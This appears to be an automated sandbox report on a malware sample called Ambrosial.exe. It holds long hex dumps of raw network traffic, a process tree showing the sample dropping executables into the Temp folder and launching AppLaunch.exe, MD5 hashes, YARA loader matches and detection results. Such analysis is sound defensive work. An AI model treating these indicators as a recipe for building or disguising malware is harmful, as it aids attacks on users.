                                                                                                                                                                                      2021-10-30 11:52:19 UTC711INData Raw: 17 30 16 96 fc 67 c4 7f 6a 0c fd 83 5e de 3f 34 e6 bd 02 3c f7 d4 f7 80 d8 67 ec 1d 7b c6 e0 79 e4 40 70 5a ce 4f a8 ea 1d 78 9d f5 42 c5 c4 0f 3e 79 de 04 f0 62 ca 52 b1 af dc af 19 f8 d9 3e 8a c1 bf 08 ef fb 87 7f f4 fb eb b7 69 89 df f0 6f fe ba 4f bf fe 37 fd 5a bd c0 bc 00 fd 22 cf 0b 43 df 51 c9 b0 a9 8b ff 73 34 70 35 ea 9f fe 78 9d 3c 32 18 9c af e3 b8 6e fd da 0a b0 7f e8 87 bf 4f ce 81 1f 89 07 ec 06 6e 04 d1 67 8c b5 e6 18 fa 40 ec 31 e3 31 b1 1f c6 ba e1 70 9d b6 44 a5 9b 80 5f f0 43 7f e1 c7 3f fd f1 9f f8 a1 4a c9 a1 0f 24 ae 53 ee ad 7d 8e c8 62 8c 16 31 e4 f5 32 b4 de 50 7f 3a 6c d6 46 8d aa f5 0c df 1a d7 0f 06 1f 5f 04 bc 91 c4 6b 97 37 18 fc 6a ff 9b 00 3d 75 43 f2 4d a9 c6 f6 91 f7 4d 80 eb d0 37 55 df 70 43 c3 4d 57 ff 54 9a 7f a4 88
                                                                                                                                                                                      Data Ascii: 0gj^?4<g{y@pZOxB>ybR>ioO7Z"CQs4p5x<2nOng@11pD_C?J$S}b12P:lF_k7j=uCMM7UpCMWT
                                                                                                                                                                                      2021-10-30 11:52:19 UTC712INData Raw: 27 c1 7f 8a 9b 4c 0c dc cc be 29 f4 c7 07 1e b1 1e ff de 47 ec 95 7f 0f c4 fc 9b 76 45 3e 1f ca 30 5c 4f cb 3f de ec 81 0b 4b 8b d7 c5 7e 6a 1a b8 be fd 77 c6 d0 87 5f ee d4 f1 03 bd af 27 af 69 5c a7 fa 02 9d 76 c4 f2 c1 8b af 0d b9 5e 97 1e 7e dd 30 22 be 63 b1 fa f2 35 b0 23 6e 88 13 1b f0 6c 00 bc e7 57 9c ee a8 9d 3c 6b 27 0f f6 bc 42 ed ff ff db 7b ef 80 7d b2 aa 3e 7c 76 59 8a 8a 20 55 05 41 40 40 11 54 44 7a 53 04 a3 62 a5 2e 45 60 e9 48 13 ec f1 17 8d b1 24 62 c1 02 88 08 52 14 44 14 01 8d 05 34 a2 51 63 8b 35 a2 62 01 41 43 54 20 2a 82 0a bb cb ee ef 53 ce 39 f7 dc 99 79 de ef fb 7c 77 f1 af 9c 79 3e 73 ea 3d f7 ce 9d 3b 33 e7 9d b7 55 71 46 60 f1 e7 c3 da 0f 70 be 8d 21 ef 85 99 ed be 1c 7c af 26 4c ec 93 1f 6e ea de 73 4e de a0 c2 1b 02 97 9c
                                                                                                                                                                                      Data Ascii: 'L)GvE>0\O?K~jw_'i\v^~0"c5#nlW<k'B{}>|vY UA@@TDzSb.E`H$bRD4Qc5bACT *S9y|wy>s=;3UqF`p!|&LnsN
                                                                                                                                                                                      2021-10-30 11:52:19 UTC714INData Raw: d3 1e b2 8e 25 6c 29 ab e0 12 c7 f9 0c ae eb 6d 05 5e 9b 9a 1b 71 ea 94 3d 57 e3 9c b9 38 23 72 6e a7 e7 21 4c 39 ef 44 dd e3 20 f7 37 69 7a 23 06 5e 6f cd 20 57 81 06 5c 39 b8 8a 35 a0 bf 5d e3 1b 37 42 45 1a b8 0b 31 e2 92 89 67 5f 43 1e 6f e0 78 2f 4d 3b e5 d2 91 df c0 f8 09 d8 c5 21 e8 b8 c8 c3 ce 38 f9 65 8f 58 80 14 97 fa 4c d0 31 3d 03 a1 f3 1e 93 1c d3 2d b0 68 bb 18 fa ba 70 23 e7 db d9 3c ff 3c ef 13 70 6e 37 32 79 a2 7c fe 2e 44 b7 79 1d 3a 6f 5e 17 be 7f 8f 6b c6 6f d6 86 5e eb 82 c7 20 d9 c7 c2 7d f7 25 29 ae 4b d9 a0 81 e7 c4 0a 76 da 18 44 43 f0 d2 49 4a 40 84 2c 5b ca 69 37 70 8e 04 e9 d8 79 d1 fa 3c 9d 09 d7 bc e6 99 df a6 25 f1 ad 5a 76 33 e0 71 27 ca c1 1d 6d 12 b5 ff 7f d4 88 17 83 16 1b e7 8f db ce 14 f9 1c e5 63 95 c0 79 8d b8 4f fb
                                                                                                                                                                                      Data Ascii: %l)m^q=W8#rn!L9D 7iz#^o W\95]7BE1g_Cox/M;!8eXL1=-hp#<<pn72y|.Dy:o^ko^ }%)KvDCIJ@,[i7py<%Zv3q'mcyO
                                                                                                                                                                                      2021-10-30 11:52:19 UTC715INData Raw: db b3 d3 9b fe fc cd cb 53 1e f3 65 fa ea f6 10 8d be dc 3f f5 f5 71 7b ec da 15 e5 e4 72 fe 29 73 f2 65 0b 9d 54 c7 dc f3 09 cc a6 1d ad cb 75 3f e2 3a cb f7 bf f4 39 54 4e 45 6f ff bb 77 2c 4f ba e0 69 92 dd c7 f8 9a 39 46 a1 bd 17 0c 36 8d 49 bb a6 cf e4 3c cc 34 c6 98 bf dd e5 1f 2c f6 0f 19 f7 df 04 f3 0d 61 f8 99 62 1c ab b3 7d d7 2b be 9f c2 51 f4 ff 3d f6 cb 50 38 be 67 33 48 1d c3 44 ea a4 fa 1a fd da 13 a2 a9 ec 10 24 93 a7 71 c5 41 f7 3e ff 0b 97 4f bb f7 3d 43 3b 9e 7e ff 37 7f 77 79 e9 f7 bf 74 b9 f0 7d ef 0b cb 76 fc ee 2d fb 06 74 5e 1c c3 bd 24 9d 43 31 f9 c4 b1 f3 43 c6 ba 6f 14 86 6f 36 b6 8b b7 1c 12 81 9b 7f ec c7 2c df f4 8c af b3 e1 14 74 d1 45 17 2d 4f 7a e4 97 62 88 d8 30 4e 73 ed b1 71 da 70 fe 21 3d f6 69 8f 5a 6e f5 c9 a7 ff 5f
                                                                                                                                                                                      Data Ascii: Se?q{r)seTu?:9TNEow,Oi9F6I<4,ab}+Q=P8g3HD$qA>O=C;~7wyt}v-t^$C1Coo6,tE-Ozb0Nsqp!=iZn_
                                                                                                                                                                                      2021-10-30 11:52:19 UTC716INData Raw: e4 2e 64 f8 d0 34 f2 e7 bd 5c a4 b1 60 00 30 0f 83 c7 03 1b b1 fe c1 fd 00 73 29 67 74 84 f1 6b d3 8d 76 60 bc 1d 1e 7f 71 9f b7 0a 01 ad 7c ef 33 ba 9e b2 e1 d9 cc 7b 09 3b 4d 5e a0 5e f0 31 76 5d c7 1d 73 80 03 00 f3 5c 78 1e 7c 2c b6 85 5d c8 b6 c3 ee e3 6e 36 b4 53 01 17 f0 fa e6 f5 e9 79 ca a2 86 50 c1 43 59 9c 73 6e ee 62 c8 73 2d 5d c5 50 9e 97 68 53 f1 3e 17 2e 9e 42 6e b6 84 7c 02 73 59 ef c5 b6 ce 67 b4 71 9f 73 7c cf ab be c5 13 3e e6 bc 96 67 e4 1a e1 fc c4 dc c2 4e d0 5f f3 16 c0 8e 1f 70 7e ba 6d 96 3b 4f 64 01 64 30 c7 d6 d6 81 00 41 be 29 97 5d b4 5b 99 e3 49 ce e1 9c b4 39 07 6c d1 a7 d6 6d d3 b3 cf 2c ba 6c 3b 13 ce 4c fc 25 01 53 f0 d0 71 59 99 7a 12 0d 62 95 55 36 8b a2 d0 c5 1a e7 f5 99 df cd 41 3d e5 df 6c 85 ec 3f d6 ec e2 8a 45 d6
                                                                                                                                                                                      Data Ascii: .d4\`0s)gtkv`q|3{;M^^1v]s\x|,]n6SyPCYsnbs-]PhS>.Bn|sYgqs|>gN_p~m;Odd0A)][I9lm,l;L%SqYzbU6A=l?E
                                                                                                                                                                                      2021-10-30 11:52:19 UTC718INData Raw: d7 3f ef ad 31 af c9 83 24 73 28 49 5d ee d4 1b 1d 49 3e 52 8e 83 3b 80 dc 95 f6 2a 6f 46 62 a7 0d b2 90 16 28 02 75 f9 64 95 4c a3 3c e1 97 46 59 8a 65 f9 c0 1e fa a8 b3 7f 9b 96 74 bd 1b 5c 6f f9 f4 cf fc b4 e8 63 86 86 81 18 02 86 e8 17 90 3a 2f 16 dd 2c 74 73 e1 4d 27 b8 90 be 40 e9 8c b3 9e 0f 55 c6 eb 21 03 9f 8a 89 90 8f 25 b7 1f 79 8c d4 c9 63 1c 90 3d 06 f3 f4 d5 78 18 2f 3f e5 71 ac 1d 70 f9 8d 56 c8 bd bd 0b a3 2c 90 cc 2f 78 ca a3 3c c8 cb 48 f7 79 d8 fd dd 47 f6 b5 e6 e8 cb 73 68 9b 81 31 a4 4c 3f 78 b6 e9 fa 98 07 8f 39 e7 cf 6f d4 7c dc 97 37 7d f4 8d 6e b0 fc e7 6f fb 8f cb 3d 3e e3 53 fd f3 63 2a c4 82 4b 6f 6f cb 24 5b f7 b7 7d 02 18 db 18 6f 9c 37 e4 26 34 e2 4b e3 16 af bb 88 bf da 73 b1 c6 02 ed 0a c2 b9 e7 9e c5 f5 84 f9 f0 7a e0 c3
                                                                                                                                                                                      Data Ascii: ?1$s(I]I>R;*oFb(udL<FYet\oc:/,tsM'@U!%yc=x/?qpV,/x<HyGsh1L?x9o|7}no=>Sc*Koo$[}o7&4Ksz
                                                                                                                                                                                      2021-10-30 11:52:19 UTC719INData Raw: 15 e7 cf 9d cc bc fc 68 6b 7b b6 a3 0d 45 1c 78 15 7b d0 47 91 b6 7a ab 46 e4 78 62 7c f8 18 1a 3f d0 8f 67 e2 71 bc 3c e9 3e f1 b6 71 ce 65 f7 39 a0 7d bf f8 0a bd 71 cf 61 b4 89 76 23 b7 fb 9d e1 b1 66 e1 22 4e 7b e8 eb 82 82 be cc 55 39 65 b7 5f 94 b2 fc b2 44 7b c7 92 ac 9b cc 57 3e e5 5d f5 dd 7c 73 f1 65 7d 20 ce c9 81 18 e7 75 1c cf d7 88 ed 6d 3b 46 5b 03 e7 3e 7d 1c 4b 8c 67 42 d8 b3 af 0d e8 eb 40 2e da 3d 0f 09 92 6d 66 21 0b a4 2e 93 86 ae e7 6c ec 49 5a 4f 40 46 68 6d 1c c0 74 7f 0a 54 c1 46 50 a7 bd c9 f2 4b e6 52 b4 5d 80 9c f7 f0 ba 3f e3 41 e3 fb b0 ff f3 04 91 bf cd 2e e0 8b b9 fc 77 4e fa 97 78 85 f1 7f 3c fd cf d3 9b 5e b1 68 07 ae 9f fd 85 ec 7f da ee 1f 33 c9 ff dd 99 fd e4 2f 68 09 94 39 26 8c 8d cf 86 fe cc ac 63 f4 14 4a d6 2c 92
                                                                                                                                                                                      Data Ascii: hk{Ex{GzFxb|?gq<>qe9}qav#f"N{U9e_D{W>]|se} um;F[>}KgB@.=mf!.lIZO@FhmtTFPKR]?A.wNx<^h3/h9&cJ,
                                                                                                                                                                                      2021-10-30 11:52:19 UTC720INData Raw: b1 10 63 36 3b ad f5 31 df 5b a2 2d 3c 2b b7 3d 06 d6 c2 68 9e c9 72 c3 ed 40 03 31 f6 6c 71 82 d1 96 f6 ba 19 37 e4 83 d6 0f 53 d8 42 27 6e 72 b3 9b 2c 77 bb c7 e5 f3 73 4e 6b 7a c8 23 ce 5f ce 39 ef bc 58 18 59 2c 05 60 cb 45 53 8b e8 00 bc e0 78 b2 ba dd 27 af e7 ea 45 81 50 6d e9 0b 3f e4 63 29 73 3b 0f e7 d3 7d 8f 05 44 8c 39 35 78 4e c0 b5 8f f3 55 b2 fd 02 74 cb d9 ae f9 20 67 2c 18 62 1d 7f d5 0f bd ea 72 f7 bb df c9 83 bb 9c e9 f6 77 ba ed f2 11 d7 ff c8 38 e6 40 1d 2b e5 3e ce 59 9f 64 b5 45 1b a2 8a 5c 16 69 94 79 7e 5c b0 51 e6 7a fc b7 a4 fb df f7 73 96 6f fd 2f ff df 72 e5 2b 5d 19 0f 1c 16 67 a3 18 f3 6f 6a f2 97 00 52 8e 02 4d 6f c7 46 b1 56 05 1b ec 2e 4a c2 c6 f8 06 e6 3c 96 fa 5b a7 7a c8 81 eb a1 81 b9 d5 cf 57 41 3e 86 ea e6 46 b0 2d
                                                                                                                                                                                      Data Ascii: c6;1[-<+=hr@1lq7SB'nr,wsNkz#_9XY,`ESx'EPm?c)s;}D95xNUt g,brw8@+>YdE\iy~\Qzso/r+]gojRMoFV.J<[zWA>F-
                                                                                                                                                                                      2021-10-30 11:52:19 UTC725INData Raw: 9c 3a 44 01 b6 d4 39 0f 9a 0b 02 bb ba 7e a1 e4 75 be 96 f3 47 16 68 4b bb 38 12 75 db c8 43 7b 22 74 f4 98 36 c6 c9 de 6c 44 7e 61 a7 a2 2b da b9 78 71 c1 62 99 be ae af e4 1d 5d f9 69 c3 1c c8 07 0c 7d d8 d6 a8 fe d3 16 79 66 64 0e e7 49 7b 2f cc 94 87 36 d9 e1 97 ad fb d9 d6 45 57 b6 1f 45 58 14 62 61 9b 11 e7 11 b2 cf 7d 80 7a c1 31 dc a5 3c fb 07 e2 42 d0 fa 91 18 84 15 17 5b ba 2c 8b 64 b4 5d 6a d7 0b 61 10 46 10 f7 69 b7 9c 56 ec 2b 26 75 06 28 44 20 ed c9 03 e9 b1 4e f2 bd 3b d7 aa a1 75 88 85 ec 62 cd 85 18 0b b2 2b a9 38 33 37 ae 10 98 7d 73 31 67 99 79 92 67 41 d7 7f d4 c2 cf 00 de 8b e2 a4 14 27 95 30 8e 20 e7 a7 91 66 06 46 da 87 cf 5a da ca 5e 06 0b de 26 93 d0 c4 26 39 f6 5c bf 25 f3 8d 88 85 54 de a8 6c b3 5e 32 6e 5a 19 23 5e 37 b8 8c 05
                                                                                                                                                                                      Data Ascii: :D9~uGhK8uC{"t6lD~a+xqb]i}yfdI{/6EWEXba}z1<B[,d]jaFiV+&u(D N;ub+837}s1gygA'0 fFZ^&&9\%Tl^2nZ#^7
                                                                                                                                                                                      2021-10-30 11:52:19 UTC729INData Raw: eb 97 16 10 27 3d e5 00 d2 6e 08 2b c3 1b c6 87 4f c8 dc 5b a6 a3 d6 8f 6c a4 6e 8b 6d ad 73 93 cd a0 53 b2 36 e7 21 68 2f 5f 80 c3 c6 80 31 de bc 3a 42 36 2c e8 a0 62 eb d4 0f b8 b0 8a f9 b2 2f 7d 62 48 a7 a7 57 bd ea a7 97 b7 be e5 af 42 43 3f 18 28 b3 e6 05 cd c3 49 ce bf d1 75 36 6f d5 1e cd b7 6a 24 e4 1e dc 13 44 de 27 d2 1c 0f 97 d0 37 c0 a2 cf 82 4d 45 1b 1e 36 1d 55 b0 f1 c1 74 24 65 5b b5 2f f0 26 11 32 fa 57 01 26 9b 6f 1e 1e 97 0f 45 d0 cc 81 70 01 90 0f 1b 00 9b 5c 82 67 f9 a1 0f bb bf 6c c7 10 7f f6 ec 97 7f f9 b7 b0 06 f8 55 4b 3e c4 bc 1e cc 93 ce 59 7e ed d7 7e 7b 79 f3 9b c7 f9 3d 2d dd f7 01 9f ad 63 ee 0f 7b ce c5 98 7b 72 1c 09 a7 39 0e de 5f 61 93 eb a0 97 73 3c 41 71 e7 75 9b 63 48 7d b2 58 61 71 86 62 e8 52 14 47 96 ad bf ff a2 c4
                                                                                                                                                                                      Data Ascii: '=n+O[lnmsS6!h/_1:B6,b/}bHWBC?(Iu6oj$D'7ME6Ut$e[/&2W&oEp\glUK>Y~~{y=-c{{r9_as<AqucH}XaqbRG
                                                                                                                                                                                      2021-10-30 11:52:19 UTC730INData Raw: 11 a6 76 51 70 ed f9 90 9b 9c 05 55 16 68 8c 75 21 66 bb 8a ae b4 03 59 64 15 5a 4c da 2c b7 37 61 a5 87 1f f3 de 8b aa 2a b6 3a 7a 8c 80 f1 05 1c 83 62 8b 08 bf bf 05 1a 50 5b ca e1 0f 9b bf 45 1a 31 f2 c5 3c 23 c6 9c 3a 0b 37 9c 1b d8 f6 7e 79 c1 72 5f 43 d8 63 5e 08 b1 69 b3 cb bb 64 b0 cb 16 72 e8 69 33 93 d3 3a 1c 43 b7 37 23 04 ec 3a 2a 54 68 1b 9c e9 c7 35 ef 9b cb 1a a6 f9 62 1d 17 e7 4c ba 20 cb 67 3f bf 1f fc 35 5f f3 34 c9 c7 d0 ab 5e f5 53 cb 5b fe f2 ad 95 4f 0f 52 c9 9c f2 b0 65 7f 94 c0 5f f3 ea 9f 39 ab b7 6a 4f 7e ca 63 f4 f0 e9 c5 54 be b9 12 c7 43 cf 3f 5c 3d ec bb c0 d8 88 fc 73 26 b4 f5 f8 fe 6d cb e3 08 37 16 ac 32 b6 53 3e 1c ab f3 da ee 7e e3 06 14 b6 7e 03 a3 dc a6 ca 19 65 8a 5b a8 64 0a dc 99 ce 7f e8 17 86 74 7a fa df ff fb 6f
                                                                                                                                                                                      Data Ascii: vQpUhu!fYdZL,7a*:zbP[E1<#:7~yr_Cc^idri3:C7#:*Th5bL g?5_4^S[ORe_9jO~cTC?\=s&m72S>~~e[dtzo
                                                                                                                                                                                      2021-10-30 11:52:19 UTC734INData Raw: 6d e1 7e 32 b7 63 b3 ef ec c3 76 63 8c 0b e0 31 d4 71 a4 df 6d d4 2e fa cf dc d2 c3 be 86 ed 2e 90 7a 8c 0a 34 5c 20 73 6c c6 b5 78 5c 20 87 7c f6 43 0f 5c 12 b1 fb 60 3b f0 d5 b8 0b 61 d3 b1 e7 1c f5 38 d9 6c cf b9 4a 59 40 b0 8a 31 f1 94 43 47 e0 c5 40 d9 f8 06 ac 8a b4 5e ac 05 2f dd c5 db c0 28 ce 08 3e c7 99 df cf f3 01 ac 5a af 5d 48 6d d7 28 f4 95 59 4d 8b ac cc b6 46 cd be 17 42 9b 91 d2 a0 73 a7 e2 23 1e 40 03 08 2e 1f 45 eb 7b b8 f2 95 ae b4 3c e5 2c 7e 36 ed fb 9f f7 a2 e5 ef ff fe 1f 42 23 8d db b0 45 eb 69 dd 10 fb 27 d3 de f4 2b bf fc eb cb af fd da 6f 85 76 7a 7a fa e6 bf 28 e4 f1 a5 4c 16 b6 30 d9 ee 6f b3 b8 40 f3 83 c7 6f d1 f8 e0 e3 1f a0 a4 ee 42 ea 18 62 b4 fe 91 ec 1a 78 80 0a 90 7b 11 a7 87 bc e0 fe 24 8b 07 62 1c 29 73 5c f7 7b d0
                                                                                                                                                                                      Data Ascii: m~2cvc1qm..z4\ slx\ |C\`;a8lJY@1CG@^/(>Z]Hm(YMFBs#@.E{<,~6B#Ei'+ovzz(L0o@oBbx{$b)s\{
                                                                                                                                                                                      2021-10-30 11:52:19 UTC738INData Raw: ee d8 14 9b f3 90 7a ec 6c 1b 34 c9 e1 5b fb 05 ec 84 b0 52 0e 49 ed 7e e8 7b 7e 60 f9 81 6f fd de 85 bf 09 75 b6 a4 5c ca e7 7e a2 0b e5 ef fa 07 9a d6 7d ad fb 4d ff 3a 66 6d df 95 c3 e0 23 1d f6 30 6f 64 d3 ea 0b 92 a0 f1 b0 1a b4 17 27 8a 6b 86 5b 52 3c ff 28 d9 0e 83 1e be b2 a5 cf 5c 70 08 e4 be 35 3b 90 05 d9 d0 0d 7c 46 a1 80 cd 05 44 fa b2 30 1a 6d e5 6f fa 90 81 4d 2e eb ce 41 64 6c ea f6 39 76 15 0f b0 30 62 9b 2c bc aa f8 09 9f fd b4 c5 5b 36 61 f6 0b 7b b6 35 22 77 62 1a 03 d1 ec 69 2b 5f 93 11 52 b6 94 75 7c 18 db 34 57 70 1a 8c 32 b8 59 0e 36 82 a4 07 73 84 84 91 cf ce c8 21 df f0 4b 49 39 60 d9 31 6b b8 28 d3 4e a8 c2 4c 72 89 22 fb 82 4a 84 d0 64 5f 0f b6 4d f1 a0 f5 35 a5 ab 8f 9f bc b7 90 13 71 8f ed cf 4d da 46 91 86 e7 ac 10 05 98 0a
                                                                                                                                                                                      Data Ascii: zl4[RI~{~`ou\~}M:fm#0od'k[R<(\p5;|FD0moM.Adl9v0b,[6a{5"wbi+_Ru|4Wp2Y6s!KI9`1k(NLr"Jd_M5qMF
                                                                                                                                                                                      2021-10-30 11:52:19 UTC742INData Raw: 3b 67 a2 1e 95 e7 b6 d3 9e cd e4 5e cb d7 06 c1 f5 f0 ba d7 bc 76 f9 db b7 9d 54 5c ec d3 17 7f cd 53 95 2b d3 61 05 94 ce b5 70 2c cd 63 9f db 6f 7d f6 0f fb 88 ef b1 7e 48 a7 4c 8a 76 61 ec b6 99 9a 2d c4 75 54 d7 75 ec a0 7f 7c e7 df 2f 5f fb 88 a7 2d bf f9 df 7e 45 7a 12 bd 05 ec 3c 3f 84 c9 da d0 4f 43 7d 8a b7 99 cc 93 0e ff 05 6f 93 a2 19 b3 8a 5b 53 77 67 61 d3 8b 2d f3 11 97 f2 89 40 b3 0d f6 e2 3a 76 da b0 fb 7d 19 3b 20 8b bc ae cf f2 88 95 0d ea 86 56 31 89 7e 0f d4 b9 0d 78 9b 42 87 6f 0f d1 45 dc 5a 85 b8 e5 ae 74 c6 e2 a1 28 44 9b 80 ec f0 2b 26 78 c6 f7 cd 6d 0d e9 15 db fa a1 87 6d 85 1c 83 e3 33 f7 e4 8f b1 50 2e 1f b6 9e 47 f9 39 56 f2 42 f6 1d 50 ab d1 66 20 c6 15 c0 47 f6 ec cb 7c e4 3e 29 8f 10 e3 cd 39 2c 3b 63 d4 ae d9 32 26 e3 ba
                                                                                                                                                                                      Data Ascii: ;g^vT\S+ap,co}~HLva-uTu|/_-~Ez<?OC}o[Swga-@:v}; V1~xBoEZt(D+&xmm3P.G9VBPf G|>)9,;c2&
                                                                                                                                                                                      2021-10-30 11:52:19 UTC746INData Raw: 6c ed b3 10 d4 46 00 21 b5 d9 96 14 de 61 68 63 30 59 9d 6d 9d e6 71 b6 fd d4 a4 7b 92 d0 77 18 ca 0e c3 1c 03 da b5 8d 36 e2 2d c6 fa f0 93 76 63 b0 2f bd 05 e7 f1 4f b1 a1 64 8b b4 85 b9 38 29 73 4d b6 15 27 8d f2 67 b6 93 f6 f5 b0 ae 9d a0 6e 3a 24 67 77 3b cd 45 fd de d4 e5 41 68 79 a8 71 b4 58 7f 45 bc cd b3 7f bf 2c da 71 9e 18 bf 22 df b7 dd a2 89 a0 e8 b7 74 d3 19 46 23 ea 11 a7 91 53 99 6c a2 c3 bd c9 7e c8 49 3a 63 c0 c9 b4 7e 7e 5a c5 78 c2 9e ee 7a f8 6b 1f 74 58 31 f5 8b 27 49 61 db d8 ad b9 b5 85 58 ae b5 d0 1a 7a 88 d8 f9 63 99 7b 33 50 3f d7 43 a6 54 c7 0b 81 a2 90 be b0 93 ca 4f de 65 6e 56 9a cd 9c b4 8e d5 87 72 8f 5b e9 34 31 30 65 7a 1c 97 b2 79 e9 0a 0f 2e 31 e5 f4 cd f2 88 84 cc 64 41 16 d7 3a c9 c2 ac f6 2c a6 29 17 bd 53 00 2c 2b
                                                                                                                                                                                      Data Ascii: lF!ahc0Ymq{w6-vc/Od8)sM'gn:$gw;EAhyqXE,q"tF#Sl~I:c~~ZxzktX1'IaXzc{3P?CTOenVr[410ezy.1dA:,)S,+
                                                                                                                                                                                      2021-10-30 11:52:19 UTC750INData Raw: c7 2d 71 fb f0 22 cd 36 c4 ac 82 dc d4 c6 bd f6 a4 43 f6 29 df a1 13 20 bf 9d 87 f3 9c 86 ce d0 3a dc 53 d4 fa 60 57 94 de 31 87 49 4d 81 58 33 2b d6 7d dd ce 3c 10 22 46 2e ec 5c 70 cd b8 04 c5 9a b8 d0 e5 f0 93 ab 39 75 65 6b 9c fb c8 dd b9 44 4b 87 74 92 a2 9b a1 22 26 73 58 87 01 d4 94 29 96 34 c6 60 a1 e9 a0 1c 47 51 1b f3 9a 36 b1 cc 35 27 db b4 95 65 65 ac a8 b2 87 65 ec c4 cb 4d 79 28 22 ab c3 38 fd d6 67 ee 0f 3d 38 44 52 67 5b c5 a0 e1 f0 40 2a a5 c5 4b 6c 71 d3 9d 1b b2 3f b3 1c 31 6a 65 03 4c b6 59 2e 29 85 92 47 31 27 c5 b2 95 b0 cd b2 f8 a4 db 42 4a 5f 33 59 6c 3a 95 6e 4b 97 6d 23 9b 24 7f 86 6e 41 bb b4 17 ad ed 10 6c b2 25 f3 99 32 2e 0c dd d5 3d b1 eb 72 52 a4 05 0d 1b a9 87 75 4f 8d 0c cc d2 9c d7 ac a2 32 68 43 27 f6 2b 0a 69 af fd ca
                                                                                                                                                                                      Data Ascii: -q"6C) :S`W1IMX3+}<"F.\p9uekDKt"&sX)4`GQ65'eeeMy("8g=8DRg[@*Klq?1jeLY.)G1'BJ_3Yl:nKm#$nAl%2.=rRuO2hC'+i


                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                      Statistics

                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                      Behavior

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      System Behavior

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:13:51:21
                                                                                                                                                                                      Start date:30/10/2021
                                                                                                                                                                                      Path:C:\Users\user\Desktop\Ambrosial.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Desktop\Ambrosial.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:27613184 bytes
                                                                                                                                                                                      MD5 hash:3480891869269773F85CF1CB389BBF96
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.317895432.0000000000E48000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:13:51:27
                                                                                                                                                                                      Start date:30/10/2021
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe'
                                                                                                                                                                                      Imagebase:0x310000
                                                                                                                                                                                      File size:1611208 bytes
                                                                                                                                                                                      MD5 hash:CB46AAC29D0C07833C3CD7395D373FCF
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:13:51:29
                                                                                                                                                                                      Start date:30/10/2021
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\Ambrosial.exe'
                                                                                                                                                                                      Imagebase:0x2023a910000
                                                                                                                                                                                      File size:16659456 bytes
                                                                                                                                                                                      MD5 hash:E3635A875AA0817F0E29544AD9FF84B5
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000000.313183186.000002023B312000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exe, Author: Joe Security
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:13:51:32
                                                                                                                                                                                      Start date:30/10/2021
                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                      Imagebase:0xac0000
                                                                                                                                                                                      File size:98912 bytes
                                                                                                                                                                                      MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:13:51:40
                                                                                                                                                                                      Start date:30/10/2021
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 516
                                                                                                                                                                                      Imagebase:0x1190000
                                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Disassembly

                                                                                                                                                                                      Code Analysis

                                                                                                                                                                                      Reset < >

                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Sleep.KERNELBASE ref: 0060FFAD
                                                                                                                                                                                        • FindWindowA.USER32(00000000), ref: 0061090A
                                                                                                                                                                                        • Sleep.KERNELBASE(6C636E6F), ref: 00610B5C
